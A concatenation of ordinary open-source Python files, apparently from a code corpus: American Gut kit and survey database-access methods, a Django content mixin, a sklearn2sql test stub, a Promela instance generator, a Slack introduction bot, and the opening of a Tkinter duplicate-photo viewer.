TRN.add(sql, [passcode, email, kitid])
return TRN.execute_fetchlast()
def getBarcodesByKit(self, kitid):
"""Returns a list of barcodes in a kit
kitid is the supplied_kit_id from the ag_kit table
"""
sql = """SELECT barcode
FROM ag_kit_barcodes
INNER JOIN ag_kit USING (ag_kit_id)
WHERE supplied_kit_id = %s"""
with TRN:
TRN.add(sql, [kitid])
return TRN.execute_fetchflatten()
def get_nonconsented_scanned_barcodes(self, kit_id):
"""Returns list of barcodes that have been scanned but not consented
Parameters
----------
kit_id : str
The supplied kit identifier to check for barcodes.
Returns
-------
list of str
The barcodes, if any, that have been scanned but not consented
"""
sql = """SELECT barcode
FROM ag_kit_barcodes
INNER JOIN ag_kit USING (ag_kit_id)
RIGHT JOIN ag_login USING (ag_login_id)
LEFT JOIN barcode USING (barcode)
FULL JOIN ag.source_barcodes_surveys USING (barcode)
WHERE ag.source_barcodes_surveys.survey_id IS NULL
AND scan_date IS NOT NULL
AND ag_login_id = %s"""
with TRN:
user = self.get_user_for_kit(kit_id)
TRN.add(sql, [user])
return TRN.execute_fetchflatten()
def checkPrintResults(self, kit_id):
"""Checks whether or not results are available for a given `kit_id`
Parameters
----------
kit_id : str
The supplied kit identifier to check for results availability.
Returns
-------
bool
Whether or not the results are ready for the supplied kit_id.
Notes
-----
If a `kit_id` does not exist this function will return False, as no
results would be available for a non-existent `kit_id`.
"""
with TRN:
sql = "SELECT print_results FROM ag_handout_kits WHERE kit_id = %s"
TRN.add(sql, [kit_id])
results = TRN.execute_fetchindex()
return False if not results else results[0][0]
def get_user_for_kit(self, supplied_kit_id):
with TRN:
sql = """SELECT ag_login_id
FROM ag.ag_kit
JOIN ag_login USING (ag_login_id)
WHERE supplied_kit_id = %s"""
TRN.add(sql, [supplied_kit_id])
results = TRN.execute_fetchindex()
if results:
return results[0][0]
else:
raise ValueError("No user ID for kit %s" % supplied_kit_id)
def get_menu_items(self, supplied_kit_id):
"""Returns information required to populate the menu of the website"""
with TRN:
ag_login_id = self.get_user_for_kit(supplied_kit_id)
info = self.getAGKitDetails(supplied_kit_id)
kit_verified = False
if info['kit_verified'] == 'y':
kit_verified = True
human_samples = {hs: self.getParticipantSamples(ag_login_id, hs)
for hs in self.getHumanParticipants(ag_login_id)}
animal_samples = {a: self.getParticipantSamples(ag_login_id, a)
for a in self.getAnimalParticipants(ag_login_id)}
environmental_samples = self.getEnvironmentalSamples(ag_login_id)
return (human_samples, animal_samples, environmental_samples,
kit_verified)
def check_if_consent_exists(self, ag_login_id, participant_name):
"""Return True if a consent already exists"""
with TRN:
sql = """SELECT EXISTS(
SELECT 1
FROM ag_consent
WHERE ag_login_id = %s AND participant_name = %s)"""
TRN.add(sql, [ag_login_id, participant_name])
return TRN.execute_fetchlast()
def get_user_info(self, supplied_kit_id):
with TRN:
sql = """SELECT CAST(ag_login_id AS VARCHAR(100)) AS ag_login_id,
email, name, address, city, state, zip, country
FROM ag_login
INNER JOIN ag_kit USING(ag_login_id)
WHERE supplied_kit_id = %s"""
TRN.add(sql, [supplied_kit_id])
row = TRN.execute_fetchindex()
if not row:
raise ValueError('Supplied kit id is not in DB: %s' %
supplied_kit_id)
user_data = dict(row[0])
user_data['ag_login_id'] = str(user_data['ag_login_id'])
return user_data
def get_barcode_results(self, supplied_kit_id):
"""Get the results associated with the login ID of the kit
Parameters
----------
supplied_kit_id : str
The user's supplied kit ID
Returns
-------
list of dict
A list of the dict of the barcode to participant name associated
with the login ID where results are ready.
"""
with TRN:
ag_login_id = self.get_user_for_kit(supplied_kit_id)
sql = """SELECT DISTINCT barcode, participant_name
FROM ag.ag_login_surveys
JOIN ag.source_barcodes_surveys USING (survey_id)
JOIN ag.ag_kit_barcodes USING (barcode)
WHERE ag_login_id = %s AND results_ready = 'Y'"""
TRN.add(sql, [ag_login_id])
return [dict(row) for row in TRN.execute_fetchindex()]
def get_login_info(self, ag_login_id):
"""Get kit registration information
Parameters
----------
ag_login_id : str
A valid login ID, that should be a test as a valid UUID
Returns
-------
list of dict
A list of registration information associated with a common login
ID.
Raises
------
ValueError
Unknown ag_login_id passed
"""
with TRN:
sql = """SELECT ag_login_id, email, name, address, city, state,
zip, country
FROM ag_login
WHERE ag_login_id = %s"""
TRN.add(sql, [ag_login_id])
info = TRN.execute_fetchindex()
if not info:
raise ValueError('ag_login_id not in database: %s' %
ag_login_id)
return [dict(row) for row in info]
def get_survey_ids(self, ag_login_id, participant_name):
"""Return the survey IDs associated with a participant or None
Parameters
----------
ag_login_id : str
A valid login ID, that should be a test as a valid UUID
participant_name : str
A participant name
Returns
-------
dict or None
The survey IDs keyed to the survey id,
or None if a survey ID cannot be found.
Raises
------
ValueError
Unknown ag_login_id or participant_name passed
"""
with TRN:
sql = """SELECT DISTINCT s.survey_id, als.survey_id
FROM ag.ag_login_surveys als
LEFT JOIN ag.survey_answers sa USING (survey_id)
LEFT JOIN ag.group_questions gq USING (survey_question_id)
LEFT JOIN ag.surveys s USING (survey_group)
WHERE ag_login_id=%s AND participant_name=%s"""
TRN.add(sql, [ag_login_id, participant_name])
survey_id = TRN.execute_fetchindex()
if not survey_id:
raise ValueError("No survey ID found!")
return dict(i for i in survey_id)
def get_participants_surveys(self, ag_login_id, participant_name,
locale='american'):
"""Returns all surveys (except external) for one participant for a
AG login.
Parameters
----------
ag_login_id : str
A valid login ID, that should be a test as a valid UUID.
participant_name : str
A participant name.
locale : str
The names for the surveys are fetched from table ag.survey_group.
For localization, there are columns for each language, which is set
by locale.
Returns
-------
List of lists or None
A list for surveys for the given participant of the given
ag_login_id. Each element is a list again [int, str, str]. Where
the first element is the survey group id, the second the survey_id
and the third is a speaking name for the survey.
None if no survey ID can be found for the combination of
participant and ag_login_id.
Raises
------
ValueError
Unknown ag_login_id or participant_name passed
"""
with TRN:
sql = """SELECT DISTINCT gq.survey_group, als.survey_id, sg.{0}
FROM ag.ag_login_surveys als
LEFT JOIN ag.survey_answers sa USING (survey_id)
LEFT JOIN ag.group_questions gq USING (survey_question_id)
LEFT JOIN ag.survey_group sg ON (survey_group=group_order)
WHERE als.ag_login_id = %s AND als.participant_name = %s
AND gq.survey_group < 0""".format(locale)
TRN.add(sql, [ag_login_id, participant_name])
surveys = TRN.execute_fetchindex()
if not surveys:
raise ValueError("No survey IDs found!")
return surveys
def get_new_survey_id(self):
"""Return a new unique survey ID
Notes
-----
This is *NOT* atomic. At the creation of this method, it is not
possible to store a survey ID without first storing consent. That
would require a fairly large structural change. This method replaces
the existing non-atomic logic, with logic that is much safer but not
perfect.
Returns
-------
str
A unique survey ID
"""
alpha = string.ascii_letters + string.digits
with TRN:
sql = """SELECT survey_id
FROM ag.ag_login_surveys"""
TRN.add(sql)
existing = {i for i in TRN.execute_fetchflatten()}
new_id = ''.join([random.choice(alpha) for i in range(16)])
while new_id in existing:
new_id = ''.join([random.choice(alpha) for i in range(16)])
return new_id
def get_countries(self):
"""
Returns
-------
list of str
All country names in database"""
with TRN:
sql = 'SELECT country FROM ag.iso_country_lookup ORDER BY country'
TRN.add(sql)
return TRN.execute_fetchflatten()
def is_deposited_ebi(self, barcode):
"""Check if barcode is deposited to EBI
Parameters
----------
barcode : str
Barcode to check
Returns
-------
bool
If the barcode has been deposited (True) or has not (False)
Raises
------
ValueError
Barcode is not a registered AG barcodes
"""
with TRN:
sql = """SELECT EXISTS(
SELECT 1 FROM ag.ag_kit_barcodes WHERE barcode = %s)"""
TRN.add(sql, [barcode])
if not TRN.execute_fetchlast():
raise ValueError('Barcode %s not a registered AG barcode' %
barcode)
sql = "SELECT deposited FROM ag.ag_kit_barcodes WHERE barcode = %s"
TRN.add(sql, [barcode])
return TRN.execute_fetchlast()
# following are DB access functions only used for unit testing:
def ut_get_arbitrary_supplied_kit_id_scanned_unconsented(self):
""" Returns arbitrarily chosen supplied_kit_id and barcode which has
been scanned but is without consent.
For unit testing only!
Returns
-------
list of str: [supplied_kit_id, barcode]
example: ['fNIYa', '000001053']
Raises
------
ValueError
If no kits can be found in the DB that have been scanned and
are without consent."""
with TRN:
sql = """SELECT supplied_kit_id, barcode
FROM barcodes.barcode
JOIN ag.ag_kit_barcodes USING (barcode)
JOIN ag.ag_kit USING (ag_kit_id)
LEFT JOIN ag.source_barcodes_surveys USING (barcode)
WHERE barcodes.barcode.scan_date IS NOT NULL
AND ag.source_barcodes_surveys.survey_id IS NULL
LIMIT 1"""
TRN.add(sql, [])
info = TRN.execute_fetchindex()
if not info:
raise ValueError('No kits found.')
return info[0]
def ut_get_arbitrary_handout_printed_min6_supplied_kit_id(self):
""" Returns a arbitrarily chosen supplied_kit_id with printed results
and 6 swaps per kit.
For unit testing only!
Returns
-------
supplied_kit_id : str
A supplied_kit_id. Example: 'DS_ubdvq'
Raises
------
ValueError
If no hand out kit exists, satisfing the given conditions."""
with TRN:
sql = """SELECT kit_id
FROM ag.ag_handout_kits
WHERE swabs_per_kit = 6 AND print_results = TRUE"""
TRN.add(sql, [])
info = TRN.execute_fetchindex()
if not info:
raise ValueError('No kits found.')
return info[0][0]
def ut_get_arbitrary_email(self):
""" Return arbitrarily chosen email.
For unit testing only!
Returns
-------
str: email
Example: 'a03E9u6ZAu@glA+)./Vn'
Raises
------
ValueError
If no emails be found in the DB."""
with TRN:
sql = """SELECT email
FROM ag.ag_login
LIMIT 1"""
TRN.add(sql, [])
info = TRN.execute_fetchindex()
if not info:
raise ValueError('No emails found.')
return info[0][0]
def ut_get_arbitrary_barcode(self, deposited=True):
""" Returns arbitrarily chosen barcode.
For unit testing only!
Parameters
----------
deposited : boolean
If true, pick a deposited barcode. Default = True
Returns
-------
str: barcode
Example: '000032951'
Raises
------
ValueError
If no barcodes can be found in the DB."""
with TRN:
sql = """SELECT barcode
FROM ag.ag_kit_barcodes
WHERE deposited=%s
LIMIT 1"""
TRN.add(sql, [deposited])
info = TRN.execute_fetchindex()
if not info:
raise ValueError('No barcodes found.')
return info[0][0]
def ut_get_email_from_ag_login_id(self, ag_login_id):
""" Returns email for a given ag_login_id.
For unit testing only!
Parameters
----------
ag_login_id : str
Existing ag_login_id.
Returns
-------
str: email
Example: 'xX/tEv7O+T@6Ri7C.)LO'
Raises
------
ValueError
If ag_login_id is not in DB.
"""
with TRN:
sql = """SELECT email
FROM ag.ag_login
WHERE ag_login_id=%s"""
TRN.add(sql, [ag_login_id])
info = TRN.execute_fetchindex()
if not info:
raise ValueError('No emails found.')
return info[0][0]
def ut_get_supplied_kit_id(self, ag_login_id):
""" Returns supplied_kit_id for a given ag_login_id.
For unit testing only!
Parameters
----------
ag_login_id : str
Existing ag_login_id.
Returns
-------
str
The supplied_kit_id for the given ag_login_id.
Example: 'DokBF'
Raises
------
ValueError
If ag_login_id is not in DB.
"""
with TRN:
sql = """SELECT supplied_kit_id
FROM ag.ag_kit
WHERE ag_login_id = %s"""
TRN.add(sql, [ag_login_id])
info = TRN.execute_fetchindex()
if not info:
raise ValueError('ag_login_id not in database: %s' %
ag_login_id)
return info[0][0]
def ut_get_participant_names_from_ag_login_id(self, ag_login_id):
""" Returns all participant_name(s) for a given ag_login_id.
For unit testing only!
Parameters
----------
ag_login_id : str
Existing ag_login_id.
Returns
-------
[[str]]
Example: ["Name - z\xc3\x96DOZ8(Z~'",
"Name - z\xc3\x96DOZ8(Z~'",
'Name - QpeY\xc3\xb8u#0\xc3\xa5<',
'Name - S)#@G]xOdL',
'Name - Y5"^&sGQiW',
'Name - L\xc3\xa7+c\r\xc3\xa5?\r\xc2\xbf!',
'Name - (~|w:S\xc3\x85#L\xc3\x84']
Raises
------
ValueError
If ag_login_id is not in DB.
"""
with TRN:
sql = """SELECT participant_name
FROM ag.ag_login_surveys
WHERE ag_login_id = %s"""
TRN.add(sql, [ag_login_id])
info = TRN.execute_fetchindex()
if not info:
raise ValueError('ag_login_id not in database: %s' %
ag_login_id)
return [n[0] for n in info]
def ut_get_barcode_from_ag_login_id(self, ag_login_id):
""" Returns all barcodes for a given ag_login_id.
For unit testing only!
Parameters
----------
ag_login_id : str
Existing ag_login_id.
Returns
-------
[dict(str, str)]
Example: [{'sample_time': None,
'sample_date': None,
'barcode': '000004217',
'site_sampled': None,
'kit_verified': 'y'}
Raises
------
ValueError
If no barcodes can be found in the DB.
"""
with TRN:
sql = """SELECT ag.ag_kit_barcodes.sample_time,
ag.ag_kit_barcodes.barcode,
ag.ag_kit_barcodes.sample_date,
ag.ag_kit_barcodes.site_sampled,
ag.ag_kit.kit_verified
FROM ag.ag_kit_barcodes
JOIN ag.ag_kit USING (ag_kit_id)
WHERE ag_login_id = %s"""
TRN.add(sql, [ag_login_id])
info = TRN.execute_fetchindex()
if not info:
raise ValueError('barcode not in database: %s' %
ag_login_id)
return [dict(row) for row in info]
def ut_get_arbitrary_supplied_kit_id_unverified(self):
""" Returns a randomly chosen supplied_kit_id that is unverified.
For unit testing only!
Returns
-------
str: supplied_kit_id
Example: 'FajNh'
Raises
------
ValueError
If no unverified supplied_kit_id can be found in the DB.
"""
with TRN:
sql = """SELECT supplied_kit_id
FROM ag.ag_kit
WHERE ag.ag_kit.kit_verified = 'n'
LIMIT 1"""
TRN.add(sql, [])
info = TRN.execute_fetchindex()
if not info:
raise ValueError('No unverified kits in DB')
return info[0][0]
def ut_get_ag_login_id_from_barcode(self, barcode):
""" Returns ag_login_id for a given barcode.
For unit testing only!
Parameters
----------
barcode : str
The barcode for which the ag_login_id should be retrieved.
Returns
-------
str: ag_login_id
Example: 'd8592c74-9694-2135-e040-8a80115d6401'
Raises
------
ValueError
If the given barcode can not be found in the DB.
"""
with TRN:
sql = """SELECT ag.ag_kit.ag_login_id
FROM ag.ag_kit_barcodes
JOIN ag.ag_kit USING (ag_kit_id)
WHERE ag.ag_kit_barcodes.barcode = %s"""
TRN.add(sql, [barcode])
info = TRN.execute_fetchindex()
if not info:
raise ValueError('Barcode "%s" not in DB' % barcode)
return info[0][0]
|
biocore/american-gut-web
|
amgut/lib/data_access/ag_data_access.py
|
Python
|
bsd-3-clause
| 57,541
|
# coding: utf-8
from django.db import models
from django.utils.translation import ugettext_lazy as _, pgettext_lazy
class ContentBase(models.Model):
"""
Base class for models that share content attributes
The attributes added by this mixin are ``title``, ``description``,
``content`` and ``is_visible``.
Attributes:
:is_visible: whether the content should be displayed by normal users
:title: title of the content, at most 192 characters
:description: most content objects have a description, with an unlimited size
:content: actual content of the object, with an unlimited size
"""
# Fields
is_visible = models.BooleanField(default=True, verbose_name=pgettext_lazy('content', "visible"))
title = models.CharField(blank=False, max_length=192, verbose_name=_("title"))
description = models.TextField(blank=True, verbose_name=_("description"))
content = models.TextField(blank=False, verbose_name=_("content"))
# Metadata
class Meta:
abstract = True
def save(self, *args, **kwargs):
""" Save the object to the database """
super(self.__class__, self).save(*args, **kwargs)
|
artscoop/django-basemix
|
basemix/mixins/content/content.py
|
Python
|
bsd-3-clause
| 1,190
|
from sklearn2sql_heroku.tests.classification import generic as class_gen
class_gen.test_model("RidgeClassifier" , "FourClass_100" , "oracle")
|
antoinecarme/sklearn2sql_heroku
|
tests/classification/FourClass_100/ws_FourClass_100_RidgeClassifier_oracle_code_gen.py
|
Python
|
bsd-3-clause
| 144
|
#!/usr/bin/env python
"""Dump instances for bunny, in Promela and SlugsIn."""
import argparse
import itertools
import pprint
import logging
import re
from tugs import utils
log = logging.getLogger(__name__)
INPUT_FILE = 'bunny.pml'
PROMELA_PATH = 'pml/bunny_many_goals_{i}.txt'
SLUGSIN_PATH = 'slugsin/bunny_many_goals_{i}.txt'
def dump_promela(n, m):
"""Dump instances of Promela."""
for i in xrange(n, m):
code = make_promela(i)
promela_file = PROMELA_PATH.format(i=i)
with open(promela_file, 'w') as f:
f.write(code)
log.info('dumped Promela for {i} masters'.format(i=i))
def dump_slugsin(n, m):
for i in xrange(n, m):
promela_file = PROMELA_PATH.format(i=i)
with open(promela_file, 'r') as f:
pml_code = f.read()
slugsin_code = utils.translate_promela_to_slugsin(pml_code)
slugsin_file = SLUGSIN_PATH.format(i=i)
with open(slugsin_file, 'w') as f:
f.write(slugsin_code)
log.info('dumped SlugsIn for {i} masters'.format(i=i))
def make_promela(n):
"""Return Promela code for instance with size `n`."""
fname = INPUT_FILE
with open(fname, 'r') as f:
s = f.read()
# set number of cells
newline = '#define H {n}'.format(n=n)
code = re.sub('#define H.*', newline, s)
newline = '#define W {m}'.format(m=n-1)
code = re.sub('#define W.*', newline, code)
# add multiple weak fairness assumptions
code += form_progress(n)
return code
def form_progress(n):
"""Return conjunction of LTL formulae for progress."""
g0 = ('[]<>((x == 0) && (y == {k}))'.format(k=k)
for k in xrange(n))
g1 = ('[]<>((x == {n}) && (y == {k}))'.format(k=k, n=n)
for k in xrange(n))
c = itertools.chain(g0, g1)
prog = ' && '.join(c)
return 'assert ltl { ' + prog + ' }'
def main():
# log
fh = logging.FileHandler('code_generator_log.txt', mode='w')
log.addHandler(fh)
log.setLevel(logging.DEBUG)
# tugs log
log1 = logging.getLogger('tugs.utils')
log1.addHandler(fh)
log1.setLevel(logging.DEBUG)
# record env
versions = utils.snapshot_versions()
log.info(pprint.pformat(versions))
# args
p = argparse.ArgumentParser()
p.add_argument('--min', type=int,
help='from this # of masters')
p.add_argument('--max', type=int,
help='to this # of masters')
args = p.parse_args()
n = args.min
m = args.max + 1
dump_promela(n, m)
dump_slugsin(n, m)
if __name__ == '__main__':
main()
|
johnyf/gr1experiments
|
examples/bunny_many_goals/make_instances.py
|
Python
|
bsd-3-clause
| 2,595
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
""" Business logic - gets request in from Slack, does stuff, sends requests back to Slack.
Notes for developers who want to add or change functionality: You're in the right module.
* If you were to run this behind a server (Flask would work well) instead of behind AWS Lambda,
it would be quite easy. Make your server take a request from Slack. You are responsible
all the way up to parsing Slack's request parameters so they are a tidy dict.
This module - handle_slack_request, specifically - will take it from there.
* If you were to port to another messaging client, this is the "guts" that you would port.
"""
import json
import random
import slacker
from funcy import memoize, retry
import yobot_config_and_secrets
from messages import get_introduction_message, generate_random_introduction_text
#=============================#
# Configuration #
#=============================#
#TODO(hangtwenty) I want to redo all this config stuff. Probably port to Flask/Zappa, and let those conventions guide.
# Since we expect users to freely modify the yobot_config_and_secrets file, let's eagerly
# affirm that these attributes are set.
# also aliasing them because "YOBOT_" namespacing not needed in this file's code...
BOT_USER_NAME = yobot_config_and_secrets.YOBOT_BOTUSER_NAME
BOT_USER_TOKEN = yobot_config_and_secrets.YOBOT_BOTUSER_TOKEN
SLACK_WEBHOOK_TOKEN = yobot_config_and_secrets.YOBOT_WEBHOOK_TOKEN
SLACK_SLASHCOMMAND_TOKEN = yobot_config_and_secrets.YOBOT_SLASHCOMMAND_TOKEN
BROADCAST_CHANNEL_NAME = yobot_config_and_secrets.YOBOT_BROADCASTCHANNEL_NAME
DEBUG = yobot_config_and_secrets.YOBOT_DEBUG
if unicode(DEBUG).lower() == "false":
DEBUG = False
WEBHOOK = 'webhook'
SLASHCOMMAND = 'slash_command'
AUTH_TOKENS_EXPECTED_BY_REQUEST_TYPE = {
WEBHOOK: SLACK_WEBHOOK_TOKEN,
SLASHCOMMAND: SLACK_SLASHCOMMAND_TOKEN
}
SENSITIVE_TOKENS_TO_SANITIZE = (SLACK_SLASHCOMMAND_TOKEN, BOT_USER_TOKEN, SLACK_WEBHOOK_TOKEN)
COMMAND_BROADCAST = "broadcast"
SLACK_CALL_EXPECTED_KEYS_COMMON = [
'token',
'team_id',
'team_domain',
'channel_id',
'channel_name',
'user_id',
'user_name',
# 'timestamp',
# 'text',
# btw - does not include 'command' or 'trigger_word' because those are exclusive to
# Slash Command or Webhook request APIs specifically.
]
FIELDNAME_USER_ID = 'id'
FIELDNAME_USER_NAME = 'name'
NULLHANDLE = "nullhandle" # defined by Slack, it seems
#=============================================#
# Slack-coupled implementation of yobot logic #
#=============================================#
@memoize
def get_slack_api():
slack_api = slacker.Slacker(BOT_USER_TOKEN)
return slack_api
@retry(2)
def handle_slack_request(params_from_slack_request):
""" Main entry point. Validate input, authenticate caller, route to handler.
:param params_from_slack_request:
:return: can be a few kinds of output; this CAN be returned to Slack and shown to end-user
so do NOT put any sensitive stuff in it ;)
"""
_validate_config_or_die()
_validate_input_from_slack_or_die(params_from_slack_request)
get_slack_request_type_and_authenticate(params_from_slack_request)
slack_request_type = get_slack_request_type(params_from_slack_request)
optional_command = ""
if slack_request_type == SLASHCOMMAND:
optional_command += " " + params_from_slack_request.get(u'command')
optional_command += " " + params_from_slack_request.get(u'text', u'<None>')
if COMMAND_BROADCAST in optional_command:
broadcast_channel_name = broadcast()
displayable_result = broadcast()
else:
# default command.
displayable_result = random_introduction(params_from_slack_request)
# XXX(hangtwenty) bit of an odd case I don't understand,
# if the incoming call was a Webhook rather than /slashcommand etc.,
# at this point in flow we've executed the command for them, but we don't want to return a string,
# (if you do, it seems to only return 1 letter the user, bit ugly?)
# anyway I found out (back in Hackathon) if we return true, it 'just works' in this case. I'd like to understand.
if get_slack_request_type(params_from_slack_request) == WEBHOOK:
displayable_result = True
return displayable_result
def broadcast():
""" Yobot broadcasts and introductory message to the broadcast channel (probably #general or #random).
"""
slack_api = get_slack_api()
broadcast_channel_name = BROADCAST_CHANNEL_NAME
try:
slack_api.chat.post_message(
broadcast_channel_name,
get_introduction_message(),
as_user=BOT_USER_NAME,
)
except Exception as e:
raise Exception(
e.message + " ... broadcast_channel_name = {}".format(broadcast_channel_name))
displayable_result = u"yobot introduced herself to {}".format(broadcast_channel_name)
return displayable_result
def random_introduction(params_from_slack_request):
""" Handle the plain `/yobot` case where someone wants a random introduction/prompt.
"""
slack_api = get_slack_api()
user_id_who_called_yobot = params_from_slack_request['user_id']
if not user_id_who_called_yobot:
raise ValueError("Can't message you: no user_id specified.")
users_list_response = slack_api.users.list()
users = users_list_response.body['members']
user_to_introduce = choose_a_user(users)
introduce_username = user_to_introduce.get(FIELDNAME_USER_NAME, None)
introduce_readable_name = _get_readable_name(user_to_introduce)
if not introduce_readable_name:
raise ValueError("Somehow the user I chose has NO real_name, username, or email. "
"This should never happen but it did.")
msg = generate_random_introduction_text(
introduce_readable_name,
introduce_username,
introducing_to_oneself=(user_id_who_called_yobot == user_to_introduce[FIELDNAME_USER_ID]))
if DEBUG:
debug_msg = _get_debug_message(params_from_slack_request)
msg = debug_msg + msg
# ensure-open a direct-message channel with the user who called, then message them
channel_im_with_caller = slack_api.im.open(user=user_id_who_called_yobot).body['channel']['id']
slack_api.chat.post_message(
channel_im_with_caller,
msg,
as_user=BOT_USER_NAME,
)
displayable_result = \
u"{as_user} just sent you a private message. Take a look.".format(
as_user=BOT_USER_NAME, introduce_username=introduce_username)
return displayable_result
class TargetUserInvalidException(ValueError):
""" Raised when a user isn't good to message, for our purposes.
"""
@retry(10, errors=TargetUserInvalidException)
def choose_a_user(users):
""" Chose a user from list (pseudo)randomly. Raise exception if deleted or has no username.
@retry decorator means normally exception won't reach end-user; we'll keep choosing up to
N times until we find a good one.
:param users: list of user-type JSON objects from Slack api (like users.list API method)
:return: a single user-type JSON object
"""
introduce_user = random.choice(users)
_debug_user_string = u"This user (id={} and email={}) ".format(
introduce_user.get(FIELDNAME_USER_ID, None),
introduce_user.get('email', None))
if introduce_user[FIELDNAME_USER_NAME] == NULLHANDLE:
# This can happen, it's seemingly when someone registered sorta but didn't finish.
raise TargetUserInvalidException(
u"{} has a null username ({!r}).".format(_debug_user_string, NULLHANDLE))
if introduce_user['deleted']:
raise TargetUserInvalidException("{} has been deleted.".format(_debug_user_string))
return introduce_user
def _get_readable_name(user):
""" Try to get a name besides the @handle, hopefully readable (like their real name).
Falls back to other things, because if they don't have a real name listed,
:param user: the user-type JSON object from Slack API.
:return:
"""
username = user[FIELDNAME_USER_NAME]
profile = user['profile']
real_name = profile.get('real_name', None)
email = profile.get('email', None)
skype = profile.get('skype', None)
if skype:
leftward_arrow_emoji = u"⬅️"
skype = u"{} ({} Skype username)".format(skype, leftward_arrow_emoji)
introduce_readable_name = real_name or email or skype or username
return introduce_readable_name
def get_slack_request_type(params_from_slack):
""" Supported requests from Slack are "Slash Command" and "Outgoing Webhook" . Which is this?
:param params_from_slack:
:return:
"""
if 'command' in params_from_slack:
return SLASHCOMMAND
elif 'trigger_word' in params_from_slack:
return WEBHOOK
else:
raise ValueError("Invalid call (params did not not match Slack API).")
#=============================#
# Validators & authentication #
#=============================#
#TODO(hangtwenty) refactor into its own module, but I think I want to get a handle on better config/env/secrets
# stuff first; and before *THAT* I might convert this to use Flask/Zappa ...
def get_slack_request_type_and_authenticate(params_from_slack):
request_type = get_slack_request_type(params_from_slack)
_authenticate(request_type, params_from_slack['token'])
def _validate_input_from_slack_or_die(params_from_slack):
""" Just because it seems "right," fully validate the request params from Slack expected.
Because input validation is a good idea ... validate the param keys in the Slack call.
- https://api.slack.com/getting-started
- https://api.slack.com/outgoing-webhooks
- https://api.slack.com/slash-commands
:param params_from_slack: Parsed parameters POST'd by Slack. These will be the same
params whether the POST comes from an "Outgoing Webhook" or a "Slash Command" integration.
:raise: ValueError
"""
for key in SLACK_CALL_EXPECTED_KEYS_COMMON:
if key not in params_from_slack:
raise ValueError(
"Invalid call (params did not not match Slack API). Expected key {!r} to be in "
"params incoming from Slack call.".format(key))
def _authenticate(slack_request_type, token):
""" Authenticate an incoming `token` against a privileged token.
Tokens allowed are set by configuration.
:param token: The `token` parameter from the incoming request. This must equal
one of the two configured tokens for "Outgoing Webhook" or "Slash Command"
:raise: ValueError
"""
authed = False
if slack_request_type == WEBHOOK:
if SLACK_SLASHCOMMAND_TOKEN:
expected_token = AUTH_TOKENS_EXPECTED_BY_REQUEST_TYPE[WEBHOOK]
if expected_token and token == expected_token:
authed = True
elif slack_request_type == SLASHCOMMAND:
expected_token = AUTH_TOKENS_EXPECTED_BY_REQUEST_TYPE[SLASHCOMMAND]
if expected_token and token == expected_token:
authed = True
if not authed:
raise ValueError("Forbidden.")
return authed
@memoize
def _validate_config_or_die():
""" Die if any essential configuration is not set. (If it's None or 0.)
:raise: ValueError
"""
if not BOT_USER_TOKEN:
raise ValueError("Need a token for the bot user in order to make API calls to Slack.")
if not BOT_USER_NAME:
raise ValueError("You should set a bot username.")
if not SLACK_WEBHOOK_TOKEN and not SLACK_SLASHCOMMAND_TOKEN:
# TODO(hangtwenty) clean up this verbose error message; move this "dev-only" suggestion
# to README.
raise ValueError("Need at least one of the two from-Slack auth tokens to be configured, "
"in order to _authenticate the caller. ")
return True
def _sanitize(output_that_end_user_might_see):
for sensitive_string in SENSITIVE_TOKENS_TO_SANITIZE:
output_that_end_user_might_see = output_that_end_user_might_see.replace(sensitive_string,
'<redacted>')
# double check...
for sensitive_string in SENSITIVE_TOKENS_TO_SANITIZE:
assert not sensitive_string in output_that_end_user_might_see
return output_that_end_user_might_see
def _get_debug_message(params_from_slack):
"""
:param params_from_slack: params from slack. (FORMPARAMS field.) What Slack POSTs.
:return: Event, formatted nicely for adding into Slack message,
also with any known-sensitive auth tokens removed
"""
dumped = json.dumps(params_from_slack, indent=2)
sanitized = _sanitize(dumped)
debug_msg = u"```\n[DEBUG]\nparams_from_slack = {}\n```\n".format(sanitized)
return debug_msg
|
hangtwenty/yobot
|
yobot/slack_logic.py
|
Python
|
bsd-3-clause
| 12,877
|
import sys, Tkinter, tkFont, ttk
sys.path.insert(0, "./src/")
import button, database
from config import *
# Note: need to set size for bg_canvas here; otherwise it will grow disregard the size set while created!
def AuxscrollFunction(event):
bg_canvas.configure(scrollregion=bg_canvas.bbox("all"), height=THUMB_HEIGHT)
# create root
root = Tkinter.Tk()
root.geometry(str(WINDOW_WIDTH)+"x"+str(WINDOW_HEIGHT)+"+100+100")
root.minsize(width=WINDOW_WIDTH, height=WINDOW_HEIGHT)
root.title("Find Duplicated Photos")
Tkinter.Grid.columnconfigure(root, 0, weight=0)
Tkinter.Grid.columnconfigure(root, 1, weight=0)
Tkinter.Grid.columnconfigure(root, 2, weight=int(DISPLAY_WIDTH/INFO_WIDTH))
Tkinter.Grid.columnconfigure(root, 3, weight=0)
Tkinter.Grid.rowconfigure(root, 0, weight=int(DISPLAY_HEIGHT/THUMB_HEIGHT))
Tkinter.Grid.rowconfigure(root, 1, weight=0)
Tkinter.Grid.rowconfigure(root, 2, weight=0)
# create frame for displaying selected photo
display_photo_frame = Tkinter.Frame(root, height=DISPLAY_HEIGHT, width=DISPLAY_WIDTH)
display_photo_frame.grid(row=0, column=0, columnspan=3)
# create frame for displaying file info
display_photo_info_frame = Tkinter.Frame(root, height=DISPLAY_HEIGHT, width=INFO_WIDTH, background="white")
display_photo_info_frame.grid(row=0, column=3, sticky=Tkinter.E+Tkinter.W+Tkinter.N+Tkinter.S)
display_photo_info_frame.pack_propagate(False) # by default the frame will shrink to whatever is inside of it
# create background for scroll bar
bg_frame = Tkinter.Frame(root, height=THUMB_HEIGHT)
bg_frame.grid(row=1, column=0, columnspan=4, sticky=Tkinter.E+Tkinter.W+Tkinter.N+Tkinter.S)
bg_canvas = Tkinter.Canvas(bg_frame, background='white')
xscrollbar = Tkinter.Scrollbar(bg_frame, orient="horizontal", command=bg_canvas.xview)
xscrollbar.pack(side=Tkinter.BOTTOM, fill="x")
xscrollbar.grid_forget()
bg_canvas.configure(xscrollcommand=xscrollbar.set)
bg_canvas.pack(fill=Tkinter.BOTH, expand=True, pady=5)
# create frame for duplicated photo batch display
batch_photo_frame = Tkinter.Frame(bg_canvas, height=THUMB_HEIGHT, background='white')
bg_canvas.create_window((0,0),window=batch_photo_frame,anchor='nw')
batch_photo_frame.bind("<Configure>", AuxscrollFunction)
# Note: don't pack batch_photo_frame here, otherwise scroll bar won't show!!!
# create photo database and loading progress bar
